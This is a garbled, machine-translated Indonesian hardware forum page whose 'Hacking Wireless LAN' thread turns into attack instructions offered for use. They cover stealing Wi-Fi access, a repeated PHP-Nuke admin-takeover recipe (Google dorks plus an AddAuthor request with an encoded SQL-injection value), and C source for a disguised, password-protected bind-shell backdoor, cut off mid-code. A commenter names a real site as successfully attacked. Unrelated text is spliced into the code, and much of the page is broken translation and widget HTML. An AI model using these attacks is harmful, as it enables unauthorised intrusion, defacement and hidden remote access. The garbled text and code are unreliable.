Вы находитесь на странице: 1из 316

Input To officials Forum HYPERMEDIA

You are not allowed to view links.


Register or Login
click here and post

The Unordinary
Enter your search terms
Web hyem.org
Submit search form

You are not allowed to view images.


Please register or login

Welcome, Guest. Please login or register.


March 06, 2010, 05:55:13 PM
1 Hour 1 Day 1 Week 1 Month Forever
Login with username, password and session length
Pricelist Update!!
PriceList UPDATE => You are not allowed to view links.
Register or Login (last updated 2009 Oct 21)

Dragon Xitro Hyper-3D Design AP1


II Phenom X4 Deneb From X2, DFI LP DK 790FXB-M2RS, Palit HD 4850, OCZ Gold Edition 2 x
1GB, 500 GB WDC 16 MB, Enhance 400W ATX + True
PROMO: Rp. 4,978,765, --

Xitro Hyper-Fire Dragon AP1


Kuma Athlon X2 7750 +, abit AX78 AMD 770 / SB600 CrossFire Platform OTES Dragon, Saphire
HD4830/HD4770, 2x2G OCZ Gold Ed 8500 CL5, WDC 320 GB 16 MB, Foxconn Case + PSU
PROMO: Rp. 4,498,765, --
BEST SELLER ...!!!!

Hyper XITRO Designer AP2


Core2Quad Q8400, DFI LP GF9400-T2RS Junior Hybrid SLI, OCZ Fatality Edition 2X2G, WDC
500 GB 16 MB, Foxconn Case + PSU True (Graph DESIGNER PC)
PROMO: Rp. 4,454,545, --

Toxic Hyper-Dragon Xitro ACF


II Phenom X4 from 550BE, DFI LP BI-M35 CrossFireX 785G Dragon Platform, HD4830 Palit
256bit, DDR3 OCZ Fatality Edition 2X2G, 500 GB WDC, 400W Enhance True + (FREE
VENDETA II for Fist buyer everyday)
PROMO: Rp. 4,976,543, --

Hyper-Dragon Xitro Epix


Athlon II X2@3.5Ghz from sargas 140 + BIOSTAR TA785GE 128 CF, Palit HD4650 Super
512MB 128bit, DDR2 2X1G, 160GB WDC 16 MB, ATX 400W
PROMO: Rp. 2,525,252, --

| LCD 15.6 "+ Key + Mouse = Rp. 950rb | LCD 19" + Key + Laser Mouse = Rp.1.300rb | LCD 16
"+ Key + Mouse = Rp. 990rb |

Palit HD4870
Palit HD4870 Sonic Dual Edition DDR5, 512MB, 256bit OC 775/4000 Dual Speed (in some cases
is still 256bit graphics lbh dr 5770 128bit superior, let alone reply we see from the price /
performancenya)
PROMO: $ 150

Palit HD4850
Palit HD4830 DDR3, 512MB, 256bit, Core: 575 / Mem: 1800Mhz + HDMI

Youngest brother of the family RV770, Still be the Price / Performance King!
PROMO: $ 90

Palit HD3850 Super DDR3


RV 670, 256 MB DDR3, 256bit, 670MHZ, 1660MHZ, 319

With DDR3, High-end card is legendary high-end display card under $ 100, especially for high-
OC .. This babe is the Most Value King!
PROMO: $ 78, 512M: $ 65

ALL AVAILAVBE

Chat Now!

[more]
Last 20 Shouts:
-------------------------------------------------- ------------------------------

Panji
Today at 01:44:28 AM
Good for Hendy hyem .. lu ganyangka win bro ..
an35
Today at 12:50:18 AM
let kumbah-kumbah
toms_momo
Yesterday at 10:31:02 PM
quiet mas dab ...
Tito Haga
Yesterday at 07:51:15 PM
wakakakakaka
alexander_corvinus
Yesterday at 06:37:00 PM
wew do that 'an: p
B.U.G.S
Yesterday at 05:05:04 PM
@ Tito Haga
nge's iso-move nggo redirection tp ga, ga dadi metu MOVED .. MOVED .. MOMED marai ngunu
wae .. wakakaka ..
coolwin
Yesterday at 04:58:26 PM
BEST UPDATE CHECK today CF KILL !!!!! I'M IN RANK 2 wakakakakaka
Tito Haga
Yesterday at 02:51:11 PM
@ BUGS
hahahaha ... .. bar Tangi sori2 turu ngono kui ngemoved yes ... haha
donkey
Yesterday at 01:57:41 PM
wakakakaka ....
blackshield ™
Yesterday at 11:54:06 PM
cilukkkkkkkk
baaaaaaa ...
B.U.G.S
Yesterday at 10:39:35 PM
Jove, moved ming kok isine kabeh kie ..? nek nge-mending move topic lawas not dikei redirection
ga kang ..
Tito Haga
Yesterday at 08:26:27 PM
wakakakakka ... means the same boat
sadnux
Yesterday at 08:20:42 PM
its not about bersih2, tp itu lho yg in sign writing about college yg
parent often say kek gitu pas kl ane marahin T_T
Tito Haga
Yesterday at 08:13:04 PM
Hahahahaha ... yes ... maap2 technical error had bersih2 le ngemovednya wrong ... so kamr jugah::
sadnux
Yesterday at 08:09:47 PM
beautiful morning .. tp yg ketendang same directly pack signaturenya ditto
wakakakak
Tito Haga
Yesterday at 07:56:09 PM
morning kang
sadnux
Yesterday at 07:47:53 PM
met pagi all
Tito Haga
Yesterday at 06:34:29 PM
weh ... kang banner onlen
Panji
Yesterday at 06:13:51 PM
miss u all ...
Tito Haga
Yesterday at 05:30:56 PM
Ndalu gang

Show last 200

Polling
Lates Post
Sell fingerboard where y. .. by vheebhee [Today at 03:46:23 AM]
Tanya Mo. .. More Niy Can ... by Genah_wae [Today at 03:20:28 AM]
help me by botaxalim [Today at 02:04:50 AM]
EXPLANATION PLEASE wearing ... by botaxalim [Today at 01:54:06 AM]
Update March 5, 2010 Cross ... by botaxalim [Today at 01:36:16 AM]
[ASK] Building Network by botaxalim [Today at 01:28:59 AM]
Asus ROG Series 890FX Mot ... by Hazzan [Today at 12:24:06 AM]
guitar hero pc pake maen ... by SYXXness [Yesterday at 11:30:42 PM]
- Post Works 3D Made An ... by B.U.G.S [Yesterday at 10:05:46 PM]
(WTA) Cooling Procie Unru ... by kocek99 [Yesterday at 07:51:45 PM]
[WTA] 915GAV Intel 3x Tit ... by masYogo [Yesterday at 05:45:43 PM]
(Unlocking Test) Biostar ... by sandlewood [Yesterday at 01:37:37 PM]
Software audio player by Tito Haga [Yesterday at 07:20:09 PM]
Adjust DDR3 you ...!!! by masYogo [Yesterday at 05:18:00 PM]
[review] HaPe Modem "ray ... by frozr_man [Yesterday at 05:08:18 PM]
AMD VS INTEL <FIGHT! > By didit_catro '[Yesterday at 04:15:54 PM]
[Ask About] proci Warranty ... by sadnux [March 04, 2010, 11:03:15 PM]
[WTA] How to mbungkam Fan B. .. by SYXXness [March 04, 2010, 08:45:18 PM]
Mainboard 890gx / 890fx by frozr_man [March 04, 2010, 08:44:57 PM]
Creativity Adu Wallpaper by donkey [March 04, 2010, 07:16:40 PM]
Statistic
Members
Total Members: 10,884
Latest: Ricko
Stats
Total Posts: 102,876
Total Topics: 7713
Online Today: 56
Online Ever: 448
(April 04, 2008, 05:10:06 AM)
Users Online
Users: 15
Guests: 61
Total: 76
MARJ1NAL
Gytautas
paulpierce
myscreen
AKA2
citraxeena
best
brewox
arveds
Aero
B.U.G.S
Ricko
damonrulz
coolwin
aikendeva
Visitor MAP
Hot http://www3.clustrmaps.com/counter/maps.php?url=http://www.hyem.org NEWS
The Unordinary Community> Forum> == SOFTWARE ==> Security (Moderator: Light)> Hacking
Wireless LAN!
Pages: [1] Go Down «previous next»
Print

Author Topic: Hacking Wireless LAN! (Read 6005 times)

berang_berang
Trade Count: (0)
[POWERED]

Posting Quality: 0
Offline

Last Login: May 24, 2006, 10:28:54 PM


Posts: 57
HY $ 0.00 credits

View Inventory
Send Money to berang_berang
Topic starter

Hacking Wireless LAN!


«On: March 09, 2006, 01:07:46 PM»

-------------------------------------------------- ------------------------------
Kalo we want to hack the standard w.LAN tools2 what we wrote butuhin, and how gmana?

Gmana way in and gmana bobolnya way?

Trus kalo yg pake linux tools recommended what? kalo windows what?
Kalo mau nyolong gmana Internet connection?

Logged

Bryant
Guest
Trade Count: (0)
Re: Hacking Wireless LAN!
«Reply # 1 on: March 13, 2006, 01:02:12 PM»

-------------------------------------------------- ------------------------------
kismet for netstumbler & nyari AP or SSID yg buat airsnort active & ngecrack password ...
manual installation & tutorial googling aja. Jgn lupa kalo successful password share ...........
Logged

The Unordinary Community Re: Hacking Wireless LAN!


«Reply # 1: March 13, 2006, 01:02:12 PM»

-------------------------------------------------- ------------------------------

Logged

RooTrick
[Community Member]
Trade Count: (0)
[POWERED]

Posting Quality: 0
Offline

Last Login: September 10, 2009, 11:04:13 PM


Posts: 93
HY $ 36.00 credits

View Inventory
Send Money to RooTrick

Re: Hacking Wireless LAN!


«Reply # 2 on: March 19, 2006, 08:13:19 PM»

-------------------------------------------------- ------------------------------
download dmn tuh om?
trus kalo uda dapet makes source code applications na na gmn?
thx bgt ...
: mrgreen:

Logged

-------------------------------------------------- ------------------------------
Let the world revolves around me ...

densinyo
[Community Member]
Trade Count: (0)
[Enthusiast]
Posting Quality: 0
Offline

Last Login: February 28, 2010, 12:54:59 PM


Posts: 133
HY $ 353.00 credits

View Inventory
Send Money to densinyo

-=- environment ranging from self-=-

Re: Hacking Wireless LAN!


«Reply # 3 on: March 20, 2006, 08:15:01 PM»

-------------------------------------------------- ------------------------------
DL dmn tuh ... boleh dong requested the link ...

Logged

-------------------------------------------------- ------------------------------
T-Force 550! Athlon64 X2 4000 +! Adata 2gb! AcBel 400w! WDC 500GB! Pioneer DVD RW!
Lite-On DVD! A4Tech
-=- environment ranging from self-=-
081-5612-7812

You are not allowed to view links.


Register or Login
You are not allowed to view images.
Please register or login

The Unordinary Community Re: Hacking Wireless LAN!


«Reply # 3: March 20, 2006, 08:15:01 PM»

-------------------------------------------------- ------------------------------

Logged

Bryant
Guest
Trade Count: (0)
Re: Hacking Wireless LAN!
«Reply # 4 on: March 21, 2006, 03:09:47 PM»

-------------------------------------------------- ------------------------------
I have lg nih project, make antenna can make WiFinya YKPN shoot, there have any experience yg
ga tin bkin antenna?
Search tool material n ada yg tau ga?
This tutorial is reply pd sdikit interest:
You are not allowed to view links.
Register or Login

Logged

MAS
[OprekPC]
Trade Count: (0)
[POWERED]

Posting Quality: 0
Offline

Last Login: April 19, 2008, 06:18:17 PM


Posts: 57
HY $ 221.00 credits

View Inventory
Send Money to MAS

Re: Hacking Wireless LAN!


«Reply # 5 on: August 16, 2006, 02:28:36 AM»

-------------------------------------------------- ------------------------------
This follow aja deh ... You are not allowed to view links.
Register or Login sdh was too old Linux (Auditor following sdh n dah find her hard to replace
Backtrack) tp sure deh, klo you are able to implement, easy wuiiih banged.

one more thing .... wifi chipset election jg jd diliat pertimbangan.bisa here

You are not allowed to view links.


Register or Login

klo for windows, in addition netstumbler pake aja WDRIVER and AirSnort.jamin isa (klo cuman
make WEP) tp klo dah target MAC auth make it give up deh mas ... hehehe, before there isa yg

Logged

-------------------------------------------------- ------------------------------
You are not allowed to view links.
Register or Login
OprekPC ..:::.. Mods - Tweak - Overclock PC

You are not allowed to view links.


Register or Login
Warungplus

still_ndESo
NBP
[Community Member]
Trade Count: (1)
[Hyper]

Posting Quality: 8
Offline

Last Login: September 20, 2008, 02:39:26 PM


Posts: 1103
HY $ 444.00 credits

View Inventory
Send Money to still_ndESo

No Body's Perfect

Re: Hacking Wireless LAN!


«Reply # 6 on: December 13, 2006, 01:58:02 PM»

-------------------------------------------------- ------------------------------
gini bro, I'm on campus pake pake internet.tp facility via pc connected via LAN. trus time ta 'clay
found in the network is also connected via laptop2 wifi. I liatnya pake cmd, trus ta 'type "net view"
out tu laptop2nya. can ta 'not hacked from the pc I pake?
thanks ya ... (just curious, do not want to harm everybody)

Logged

psyCHo_L061c
Trade Count: (0)

Posting Quality: 0
Offline

Last Login: January 09, 2007, 09:24:31 PM


Posts: 2
HY $ 0.00 credits

View Inventory
Send Money to psyCHo_L061c
Re: Hacking Wireless LAN!
«Reply # 7 on: January 08, 2007, 04:52:37 PM»

-------------------------------------------------- ------------------------------
bisa aja om mah ..... hehehehe it easy, if u could've and taw gimana cara fingerprinting and foot
printingnya oms
trus taw a bug we're looking for security holes or it is what there do ,,,...... hehehehehehe so i am
just newbie

Logged

still_ndESo
NBP
[Community Member]
Trade Count: (1)
[Hyper]

Posting Quality: 8
Offline

Last Login: September 20, 2008, 02:39:26 PM


Posts: 1103
HY $ 444.00 credits

View Inventory
Send Money to still_ndESo

No Body's Perfect

Re: Hacking Wireless LAN!


«Reply # 8 on: January 26, 2007, 08:04:29 PM»

-------------------------------------------------- ------------------------------
Quote from: psyCHo_L061c on January 08, 2007, 04:52:37 PM
bisa aja om mah ..... hehehehe it easy, if u could've and taw gimana cara fingerprinting and foot
printingnya oms
trus taw a bug we're looking for security holes or it is what there do ,,,...... hehehehehehe so i am
just newbie

well, I mbok diajarin lha mas ... I still underneath a newbie


hehee

Logged

The Unordinary Community Re: Hacking Wireless LAN!


«Reply # 8: January 26, 2007, 08:04:29 PM»

-------------------------------------------------- ------------------------------

Order: hyem_toko

Logged

silverx
Trade Count: (0)
[Enthusiast]

Posting Quality: 1
Offline

Last Login: June 18, 2008, 02:50:14 PM


Posts: 121
HY $ 120.00 credits

View Inventory
Send Money to silverx

Enjoy Life It's ......

Re: Hacking Wireless LAN!


«Reply # 9 on: March 17, 2007, 11:41:56 AM»

-------------------------------------------------- ------------------------------
These tools can be useful for browsing sangant increasingly entering a network, Cain And Abel via
google search .... aj certainly can, install and run, there you can open companies that adapada
network, although worgroupnya different ...........................
I was confused for existing antenna tutorinya above, connect to port ake PCnya hell? pake serial?
ato pake USB?? his antennae cuman doang ditutorial
Jump aj boss ...

1.Buka site www.google.com


Google dork 2.kemudian kya msukkan gene | => allinurl: .com / nuke / index.php or allinurl: .org /
nuke / index.php
Klw udh 3.nah ne ktemutargetnya lnjut. example: www.sakaw.com / nuke / index.php
Gnti red 4.yg with admin.php
5.jika already enter the following bug ne td behind the site:

? AddAuthor & op = sakaw32 & add_aid = add_name =


God & anjinkliar & add_pwd = add_email =
skw_swat@yahoo.com @ yahoo.com & add_radminsuper = 1 & admin =
eCcgVU5JT04gU0VMRUNUIDEvKjox

eg: www.sakaw.com / nuke / admin.php?


op = AddAuthor & sakaw32 & add_aid = add_name =
God & anjinkliar & add_pwd = add_email =
skw_swat@yahoo.com & add_radminsuper = 1 & admin =
eCcgVU5JT04gU0VMRUNUIDEvKjox

Www.sakaw.com/nuke/admin.php?op=mod_author 6.kemudian will appear on the address bar


7. then you will send log in, enter your id & password was.
Remember?
id = sakaw32 => clay wrote above earlier
password = anjinkliar => clay wrote above earlier

Well lu skrg udah into the "Administration Menu" tsb site.


so, you dah go to the site .. klw tp tdk bsa means tu dah site on path adminnya ma ...

Happy Hacking ..

Hacking is ART .. ^ ^

Tags: Hack, hackers, Hacking


Comments
19 Comments To "Old Deface PHP Nuke Site"
Please give your response to this article ...

Cheap 1 August 2009 at 12:13 pm Thank you for this valuable post. It changed my approach

ifur on 8 August 2009 10:00 am illegal operation

Killer on 14 August 2009 11:28 am illegal operation


fails to hold ... ... ....

wilbros on 18 August 2009 6:19 pm eCcgVU5JT04gU0VMRUNUIDEvKjox


what d code above should look like it? ato bs d change?
please d bls.
thx
newbie_full on 19 August 2009 3:39 pm wih.
bug ya da lama banget yak ..

Troy on 23 August 2009 6:44 pm q nyoba dh successful ... .. mantep bgt tu link

http://www.abettergradetutoring.com/nuke/index.php

q yng trus ni tanyain code

//////// code ////////////

? AddAuthor & op = sakaw32 & add_aid = add_name =


God & anjinkliar & add_pwd = add_email =
skw_swat@yahoo.com @ yahoo.com & add_radminsuper = 1 & admin =
eCcgVU5JT04gU0VMRUNUIDEvKjox

/////// code //////////////

q kmrin nyoba
AddAuthor & add_aid = q sakaw32 ... .. AddAuthor & gnti with add_aid = Trojan ... ... .. trus gnti q
& add_name =
God & add_pwd = Trojan

koq gk bisa ya ... ....

trs jga code

eCcgVU5JT04gU0VMRUNUIDEvKjox

What could tu? klo kt dignti other dengn can pa ....

penjlasannya please ..

ovasagaf on 25 August 2009 8:52 pm gini aja bro, lo udah site deface what? cz situs2 yang laen gw
ga bisa smua try, ...

Sumbangkan terjemahan yang lebih baik


Terima kasih telah menyumbangkan saran terjemahan Anda ke Google Terjemahan.
Menyumbangkan terjemahan yang lebih baik:
Jump aj boss ... <br> <br>1.Buka site www.google.com <br>Google dork 2.kemudian kya msukkan
gene | =&gt; allinurl: .com / nuke / index.php or allinurl: .org / nuke / index.php <br>Klw udh 3.nah
ne ktemutargetnya lnjut. example: www.sakaw.com / nuke / index.php <br>Gnti red 4.yg with
admin.php <br>5.jika already enter the following bug ne td behind the site: <br> <br>? AddAuthor
&amp; op = sakaw32 &amp; add_aid = add_name = <br>God &amp; anjinkliar &amp; add_pwd =
add_email = <br>skw_swat@yahoo.com @ yahoo.com &amp; add_radminsuper = 1 &amp; admin
= <br>eCcgVU5JT04gU0VMRUNUIDEvKjox <br> <br>eg: www.sakaw.com / nuke / admin.php?
<br>op = AddAuthor &amp; sakaw32 &amp; add_aid = add_name = <br>God &amp; anjinkliar
&amp; add_pwd = add_email = <br>skw_swat@yahoo.com &amp; add_radminsuper = 1 &amp;
admin = <br>eCcgVU5JT04gU0VMRUNUIDEvKjox <br>
<br>Www.sakaw.com/nuke/admin.php?op=mod_author 6.kemudian will appear on the address bar
<br>7. then you will send log in, enter your id &amp; password was. <br>Remember? <br>id =
sakaw32 =&gt; clay wrote above earlier <br>password = anjinkliar =&gt; clay wrote above earlier
<br> <br>Well lu skrg udah into the &quot;Administration Menu&quot; tsb site. <br>so, you dah
go to the site .. klw tp tdk bsa means tu dah site on path adminnya ma ... <br> <br>Happy
Hacking .. <br> <br>Hacking is ART .. ^ ^ <br> <br>Tags: Hack, hackers, Hacking <br>
Comments <br>19 Comments To &quot;Old Deface PHP Nuke Site&quot; <br>Please give your
response to this article ... <br> <br>Cheap 1 August 2009 at 12:13 pm Thank you for this valuable
post. It changed my approach <br> <br>ifur on 8 August 2009 10:00 am illegal operation <br>
<br>Killer on 14 August 2009 11:28 am illegal operation <br>fails to hold ... ... .... <br>
<br>wilbros on 18 August 2009 6:19 pm eCcgVU5JT04gU0VMRUNUIDEvKjox <br>what d code
above should look like it? ato bs d change? <br>please d bls. <br>thx <br> <br>newbie_full on 19
August 2009 3:39 pm wih. <br>bug ya da lama banget yak .. <br> <br>Troy on 23 August 2009
6:44 pm q nyoba dh successful ... .. mantep bgt tu link <br>
<br>http://www.abettergradetutoring.com/nuke/index.php <br> <br>q yng trus ni tanyain code
<br> <br>//////// code //////////// <br> <br>? AddAuthor &amp; op = sakaw32 &amp; add_aid =
add_name = <br>God &amp; anjinkliar &amp; add_pwd = add_email =
<br>skw_swat@yahoo.com @ yahoo.com &amp; add_radminsuper = 1 &amp; admin =
<br>eCcgVU5JT04gU0VMRUNUIDEvKjox <br> <br>/////// code ////////////// <br> <br>q kmrin
nyoba <br>AddAuthor &amp; add_aid = q sakaw32 ... .. AddAuthor &amp; gnti with add_aid =
Trojan ... ... .. trus gnti q <br>&amp; add_name = <br>God &amp; add_pwd = Trojan <br>
<br>koq gk bisa ya ... .... <br> <br>trs jga code <br> <br>eCcgVU5JT04gU0VMRUNUIDEvKjox
<br> <br>What could tu? klo kt dignti other dengn can pa .... <br> <br>penjlasannya please .. <br>
<br>ovasagaf on 25 August 2009 8:52 pm gini aja bro, lo udah site deface what? cz situs2 yang laen
gw ga bisa smua try, ... <br> <br>

Bahasa yang tersedia untuk penerjemahan:

Afrikaans
Albania
Arab
Bahasa Indonesia
Belanda
Bulgar
Byelorusia
Cek
Dansk Esti
Farsi
Galisia
Hindi
Ibrani
Inggris
Irlandia
Islan
Italia Jepang
Jerman
Katalana
Korea
Kreol Haiti
Kroat
Latvi
Lituavi
Magyar Makedonia
Malta
Mandarin
Melayu
Norsk
Pilipino
Polski
Portugis
Prancis Rumania
Rusia
Serb
Sloven
Slowakia
Spanyol
Suomi
Swahili
Swensk Thai
Turki
Ukraina
Vietnam
Wales
Yiddi
Yunani Php nuke hack site yoo ... ..
Go to the site www.google.com
trus type =>
allinurl: .com / nuke / index.php or
allinurl: .org / nuke / index.php.
Well ... .. targetnyo reply then dem see step
selanjutnyo are:
1. www.target.com / nuke / index.php
2. www.target.com / nuke / admin.php =>
index.php reply above was modified
so admin.php
3. This bug Masukke behind this site:

? AddAuthor & op = budakbaonk & add_aid = add_name =


God & add_pwd = scum & add_email =
sandal_karet@yahoo.com & add_radminsuper = 1 & admin =
eCcgVU5JT04gU0VMRUNUIDEvKjox

eg: www.target.com / nuke / admin.php?


op = AddAuthor & budakbaonk & add_aid = add_name =
God & add_pwd = scum & add_email =
sandal_karet@yahoo.com & add_radminsuper = 1 & admin =
eCcgVU5JT04gU0VMRUNUIDEvKjox

Kalo is the site they will be fierce dem in his path kek admin.
But the reply successfully, then the url / browsing lu appear
www.target.com/nuke/admin.php?op=mod_author

5. Disano send you the login, masuke id & password you were.
Remember?
id = budakbaonk => clay wrote above earlier
password = scum => clay wrote above earlier
Now you She dem go to "Administration Menu" the site said.
He meant you had a site that mengusai skrg! He he he he he
Skrg you select an image Mobile (dibawahnyo ado writing Messages),
Column title =>

Column content =>

Column expiration => unlimited


click the tab trus yg ado messages Add below
Kalo dem, open url / new browsing trus this type target site,
eg www.target.com / nuke or www.target.com / nuke / index.php
kalo hackan results katek you click the tab refresh cubo yg ado
in addition to the above reply url / browsing you were
dem stay so click refresh bae laitu
He had a web frontpage you get to the punyo you dewek
Payo Linggau rame2 kito
bantu2
klo ado info for 2 no
Namo more Linggau tu pulo on the market rose
man's test tu wong die dem asak ngetop

23 December 2008 - 20:14:31 (ulagamma)


Other News
»Feature - Computer virus characteristics
»Some error in the Web We stay away from the robots Search Engine
»How To Increase Alexa Rank Websites We
»Make Yahoo Mesengger Multiplane Online (1 computer can be much the same yahoo ID)
»View the news from detiknet site in blog / your website
»Setting Gmail and yahoo email in Outlook express
»Warning
»Warning2
»Warning3
»Picture Mail Backup Didapet in Spaceku
»Track IP Address in yahoo Messenger
»Track Location Server
»YM his many
»How to Sign In DOS in Windows XP Yg locked Serba
»Public Facilities through Windows Yg limited
»How to enter DOS Computers Through laen
»Humor House members and Laptops
»Wait presence www.dapurkomputer.site90.net
»Prevent Copy or Cut Files From Computers to Flashdisk
»Visual Basic simple but dangerous
»Toll Local Toll Interlokal So
»Motor Games Maen
»Trick SMS Without no Sender
»How To Record All Activities In The Video Browser in Firefox
»Mendisabled - Mute function on the mouse right click
»Trick Yahoo Messenger - Send an IM with YM - Nge-hack YM friend
»How to hack Google logo so gogle
»Recording Discussion on Skype - Yahoo Messenger - Gtalk
»Tips to Get Hits / Pageviews Which High on Blog
»Tips to (web) blog quickly known everywhere
»How To - Tips to website ranked on Google Search Engine
»Want to Find Crack - crack-an
»New dapet ne
»Optimizing the Use of Search Engine
»Make a china yahoo id ..
»Warehouse Scrift
»Try Self-ya
»" Engineering - Engineering Carding "
»Make Window pirated computer Windows Genuine You So
»Extending the Windows Vista activation period
»Download Crack Windows pirated So original
»How Menjebol PDF File Password
»Program For Detecting SQL Injection On Website
»Create program displays the IP address, city, state blog
»Send email bulging (without Body Subject Only) in GMail
»Make a WordPress Excerpt Cloning
»Hack wirelles
»Wi-Fi Hack
»Fixing broken Hardisk yg / badsector
»5 Linux Live CD Distro best Category Hacking
»Reset Printer Canon IP1880
»2 Line Speedy Want to make one of the Mikrotik
»Wifi Radar to check HOT SPOT around us
»Quick Installation Tutorial Endian Firewall
»Tutorial Carding Complete
»Install Backtrack2 N Vista live CD in a single hard drive on my laptop
»IP gateway on diknas districts in South Sumatra
»Create Mobile Website Version (To Blog Can Opened in Mobile)
»Building Online Stores with Joomla! 1.5.8
»Tutorial Create Website with Photoshop CS
»Make a desktop background FlashDisk
»Dreams
»Saving Data 'My Documents'
»Changing Image Size Icon On Desktop
»Adding Capacity Memory / RAM With Flashdisk
»Improving Performance Computers
»Deadly And Quickly Turn on Computer
»Turn off the computer with 1 Button Keyboard
»HACK FS

Sumbangkan terjemahan yang lebih baikTerjemahkan dari: Bahasa IndonesiaInggris—Deteksi


bahasa—AfrikaansAlbaniaArabBahasa
IndonesiaBelandaBulgarByelorusiaCekDanskEstiFarsiGalisiaHindiIbraniInggrisIrlandiaIslanItaliaJ
epangJermanKatalanaKoreaKreol Haiti
ALPHAKroatLatviLituaviMagyarMakedoniaMaltaMandarinMelayuNorskPilipinoPolskiPortugisPr
ancisRumaniaRusiaSerbSlovenSlowakiaSpanyolSuomiSwahiliSwenskThaiTurkiUkrainaVietnamW
alesYiddiYunani
Terjemahkan ke: InggrisBahasa Indonesia—AfrikaansAlbaniaArabBahasa
IndonesiaBelandaBulgarByelorusiaCekDanskEstiFarsiGalisiaHindiIbraniInggrisIrlandiaIslanItaliaJ
epangJermanKatalanaKoreaKreol Haiti
ALPHAKroatLatviLituaviMagyarMakedoniaMaltaMandarin (Aks. Sederhana)Mandarin (Aks.
Tradisional)MelayuNorskPilipinoPolskiPortugisPrancisRumaniaRusiaSerbSlovenSlowakiaSpanyol
SuomiSwahiliSwenskThaiTurkiUkrainaVietnamWalesYiddiYunani

Terjemahan Bahasa Indonesia ke InggrisTunjukkan huruf latin


Backdoor Bindtty
Posted 29 October 2005 at 16:14 hrs Hacking → Just one person who commented
How to hide the road Backdor in background

Exploit:
/*
BindTTY.c
Created by someone
i just Modify ..
Open Telnet with Password,
Stealth Background Processes ..

compiled with: gcc-o bind bind.c


simple just run. / bind
for more 'secure'
1. mv httpd bind
2. . / httpd
3. ps-A
Can u See Your BackDoor? ^ ^
4. but i dont know how to hide in / etc / services?
Someone know?
*/

# define HOME "/"


# define TIOCSCTTY 0 × 540E
# define TIOCGWINSZ 0 × 5413
# define TIOCSWINSZ 0 × 5414
# define ECHAR 0 × 1d
# define PORT 2006
# define BUF 32,768
# define proc "/ usr / sbin / httpd" / * Change this for Fake ID proces * /
# include
# include
# include
# include
# include
# include
# include
# include
# include
# include
# include
# include
winsize struct (
unsigned short ws_row;
unsigned short ws_col;
unsigned short ws_xpixel;
unsigned short ws_ypixel;
);
int sc;
char passwd [] = "beautiful"; / * Change the password * /
char motd [] = "Arai =- Private BaCkd00r # Jambihackerlink-= \ n ';
cb_shell void () (
char buffer [150];
write (sc, "Password:", 10);
read (sc, buffer, sizeof (buffer));
if (! strncmp (buf, passwd, strlen (passwd))) (
write (sc, motd, sizeof (motd));
)
else (
write (sc, "Die! \ n", 7);
close (sc); exit (0);
)
)
/ * Creates tty / pty name by index * /
void get_tty (int num, char * base, char * buf)
(
char series [] = "pqrstuvwxyzabcde";
char subs [] = "0123456789abcdef";
int pos = strlen (base);
strcpy (buf, base);
buf [post] = series [(num>> 4) & 0xF];
buf [post +1] = subs [num & 0xF];
buf [postal +2] = 0;
)
/ * Search for free pty and open it * /
open_tty int (int * tty, int * pty)
(
char buf [512];
int i, fd;
fd = open ( "/ dev / ptmx", O_RDWR);
close (fd);
for (i = 0; i <256; i + +) (
get_tty (i, "/ dev / pty", buf);
* pty = open (buf, O_RDWR);
if (* pty <0) continue;
get_tty (i, "/ dev / tty", buf);
* tty = open (buf, O_RDWR);
if (* tty <0) (
close (* pty);
continue;
)
return 1;
)
return 0;
)

/ * To avoid creating zombies * /


sig_child void (int i)
(
signal (SIGCHLD, sig_child);
waitpid (-1, NULL, WNOHANG);
)
void Hangout (int i)
(
kill (0, SIGHUP);
kill (0, SIGTERM);
)
int main (int argc, char * argv [])
(
int pid;
struct sockaddr_in serv;
struct sockaddr_in cli;
int sock;
char cmd [256];
strcpy (argv [0], proc);
signal (SIGCHLD, SIG_IGN);
sock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sock <0) (
perror ( "socket");
return 1;
)
bzero ((char *) & serv, sizeof (serv));
serv.sin_family = AF_INET;
serv.sin_addr.s_addr = htonl (INADDR_ANY);
serv.sin_port = htons (PORT);
if (bind (sock, (struct sockaddr *) & serv, sizeof (serv)) <0) (
perror ( "bind");
return 1;
)
if (listen (sock, 5) <0) (
perror ( "listen");
return 1;
)
printf ( "Arai BackDoor is starting ..."); fflush (stdout);
pid = fork ();
if (pid! = 0) (
printf ( "OK, pid =% d \ n", pid);
printf ( "# Jambihackerlink Private BackD00r .. \ n");
return 0;
)
/ * Daemonize * /
setsid ();
chdir ("/");
pid = open ( "/ dev / null", O_RDWR);
dup2 (pid, 0);
dup2 (pid, 1);
dup2 (pid, 2);
close (pid);
signal (SIGHUP, SIG_IGN);
signal (SIGCHLD, sig_child);
while (1) (
int scli;
int slen;
slen = sizeof (cli);
scli = accept (sock, (struct sockaddr *) & cli, & slen);
if (scli <0) continue;
pid = fork ();
if (pid == 0) (
int subshell;
int tty;
int pty;
fd_set fds;
char buf [BUF];
char * argv [] = ( "sh", "-i", NULL);
# define MAXENV 256
# define ENVLEN 256
char * envp [MAXENV];
envbuf char [(MAXENV +2) * ENVLEN];
int j, i;
char home [256];
/ * Setup Environment * /
envp [0] = home;
sprintf (home, "HOME =% s", HOME);
j = 0;
do (
i = read (scli, & envbuf [j * ENVLEN], ENVLEN);
envp [j +1] = & envbuf [j * ENVLEN];
j + +;
if ((j> = MAXENV) | | (i <ENVLEN)) break;
) While (envbuf [(j-1) * ENVLEN]! = '\ N');
envp [j +1] = NULL;
/ * Create new group * /
setpgid (0, 0);
want to pay the debt money debt
100000000000000000 looking 100,000,000,000 for
the bailiffs round great guy nana
100000000000000000000000000000 yadi
100000000000000000000000000000000000000 child
attended a child to follow in the bath when I want to
leave the house when I want to walk up the car 100
meters from the house following children yadi
1000000000000000000000000000000000000000000
000000000 extraordinary grand nina mugiroh haris
/ * Open slave & master side of tty * /
if (! open_tty (& tty, & pty)) (
char msg [] = "Can not fork pty, bye! \ n";
write (scli, msg, strlen (msg));
close (scli);
exit (0);
)
/ * Fork child * /
subshell = fork ();
if (subshell == 0) (
/ * Close master * /
close (pty);
/ * Attach tty * /
setsid ();
ioctl (tty, TIOCSCTTY);
/ * Close local part of connection * /
close (scli);
close (sock);
signal (SIGHUP, SIG_DFL);
signal (SIGCHLD, SIG_DFL);
dup2 (tty, 0);
dup2 (tty, 1);
dup2 (tty, 2);
close (tty);
cb_shell ();
execve ( "/ bin / sh", argv, envp);
)
/ * Close slave * /
close (tty);
signal (SIGHUP, Hangout);
signal (SIGTERM, Hangout);
while (1) (
/ * Watch tty and client side * /
FD_ZERO (& fds);
FD_SET (pty, & fds);
